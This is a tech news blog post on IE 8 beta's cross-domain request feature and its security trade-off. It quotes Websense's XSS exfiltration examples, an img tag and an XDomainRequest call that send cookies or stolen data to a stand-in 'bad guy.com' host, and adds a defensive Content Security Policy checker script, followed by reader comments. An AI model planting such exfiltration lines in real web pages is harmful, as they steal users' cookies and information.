IE 8: Cross scripting defense a double-edged sword

Update: As most of the tech world knows, IE 8 has landed with its first beta, but the security improvements may raise some other issues to ponder.

Folks--especially security researchers--are kicking the tires on IE 8 (all resources) and finding a few problems that go along with Microsoft's protection enhancements.

For instance, Websense homes in on IE 8's cross domain request restrictions. Frankly, Websense's post is a bit over my head, but the money excerpt is notable.

Because Internet Explorer 8 allows cross domain requests, malicious attackers can use content injection holes in Web sites a lot more efficiently. Typically, when a site is vulnerable to XSS (cross-site scripting), an attacker will inject content to steal user information and relay it back as follows:

<img src="http://bad guy.com/steal.php?cookie=" + cookie />

The <img> tag is used because it is one of the few things allowed to communicate externally. With the new XDR object, the attacker can simply insert script code that communicates directly to a malicious server:

var xdr = new XDomainRequest(); xdr.open("POST", "http://www.bad guy.com/"); xdr.send(stolenInfo);

With direct communication, it is foreseeable that injection payloads will evolve in complexity and features. Malicious frameworks can be built so that the client is constantly communicating with the malicious server to determine what actions to take next. Stealing user information is just the start of what can be achieved with new emerging technologies such as these.

This statement on IE 8 just illustrates the security arms race. Vendors race to patch, protect and enhance their software to lock out threats. But those threats just keep evolving. By the time IE 8 clears its beta hurdles, there will be new threats to take advantage of whatever scheme Microsoft has cooked up.

Update: Tweaked the headline. Websense got back to me with the following clarification. In a nutshell, I goofed. Websense clarifies:

The new ability of cross-domain requests does not really increase the attack surface, but simply provides an additional, easier means to communicate externally. As you can see this provides benefits not only to developers but to malicious folks as well.
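
Websense's clarification can be checked against a modern mitigation, Content Security Policy, which the article does not mention and which postdates IE 8. The added example below (not code from the article or from Websense) reports which of the two channels in the excerpt, an image load or a script-initiated request (XMLHttpRequest/fetch, the successors to XDomainRequest), a given policy still leaves open to a third-party host. The function names, the `shop.example` and `collector.invalid` hosts and the sample policies are constructed, and source matching is simplified.

```javascript
// Channel -> governing CSP directive: image loads use img-src, script-initiated
// requests (XMLHttpRequest, fetch, sendBeacon) use connect-src.
const CHANNELS = { image: "img-src", script_request: "connect-src" };

// Parse a CSP header value into { directive: [source, ...] }; first occurrence wins.
function parseCsp(header) {
  const policy = Object.create(null);
  for (const part of header.split(";")) {
    const [name, ...sources] = part.trim().split(/\s+/);
    const key = name.toLowerCase();
    if (key && !(key in policy)) policy[key] = sources;
  }
  return policy;
}

// Simplified matching: 'self', *, scheme-source ("https:") and host-source with
// optional scheme and leading "*." wildcard. Ports and paths are not handled.
function sourceAllows(source, target, page) {
  const s = source.toLowerCase();
  if (s === "'self'") return target.origin === page.origin;
  if (s === "*") return ["http:", "https:"].includes(target.protocol);
  if (/^[a-z][a-z0-9+.-]*:$/.test(s)) return target.protocol === s;
  const m = /^(?:([a-z][a-z0-9+.-]*):\/\/)?(\*\.)?([a-z0-9.-]+)$/.exec(s);
  if (!m) return false; // 'none', 'unsafe-inline', nonces: never match a URL
  const [, scheme, wildcard, host] = m;
  // A scheme-less host matches the page's scheme or an upgrade to https.
  const schemeOk = scheme
    ? target.protocol === scheme + ":"
    : target.protocol === page.protocol || target.protocol === "https:";
  if (!schemeOk) return false;
  return wildcard ? target.hostname.endsWith("." + host) : target.hostname === host;
}

// Channels through which a page served with `cspHeader` can still send a request
// to `targetUrl`. A channel with no governing directive is unrestricted.
function openChannels(cspHeader, pageUrl, targetUrl) {
  const policy = parseCsp(cspHeader);
  const page = new URL(pageUrl), target = new URL(targetUrl);
  return Object.keys(CHANNELS).filter((channel) => {
    const sources = policy[CHANNELS[channel]] ?? policy["default-src"];
    return sources === undefined || sources.some((s) => sourceAllows(s, target, page));
  });
}

// Constructed hosts and policies, for illustration only.
const PAGE = "https://shop.example/cart", COLLECTOR = "https://collector.invalid/c";
for (const csp of ["", "connect-src 'self'", "default-src 'self'; img-src 'self'"]) {
  console.log(JSON.stringify(csp), "->", openChannels(csp, PAGE, COLLECTOR));
}
```

A policy that restricts only `connect-src` leaves the image channel open, which matches the clarification: script-initiated requests are an additional channel, not the only one.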


Talkback

4 comments
  • Same as It Ever Was

    IE 8 Beta is merely the news hook. Security is a cycle of better
    locks and better lock picks. This cycle applies to everyone's
    browsers, not just IE.

    I suspect that Microsoft will mitigate the issue identified above
    as they have done in IE7 by maintaining blacklists of dangerous
    sites and requiring a call in to vet any potentially dangerous
    transaction. That means it will be a race to snag victims before
    the site is identified to the guardians and/or figuring out ways
    to increase the guardians' false positives rendering them
    ineffective.
    DannyO_0x98
    • Still MS sw

      So you believe this kind of plain basic mistake will be mitigated somehow? Good luck to you. MS covers one hole to show ten others.
      green alien
  • another article that has no meaning

    Why did you waste our time with this article? This is not a new security hole. It is functionality that MS has been giving the user forever. Unfortunately, it can be used for ill as well as good.

    bruce
    bruce@...
  • RE: IE 8: Threats will evolve to elude Microsoft's new security features

    I think someone at MS is in serious need of some mental health services!
    wolfpack99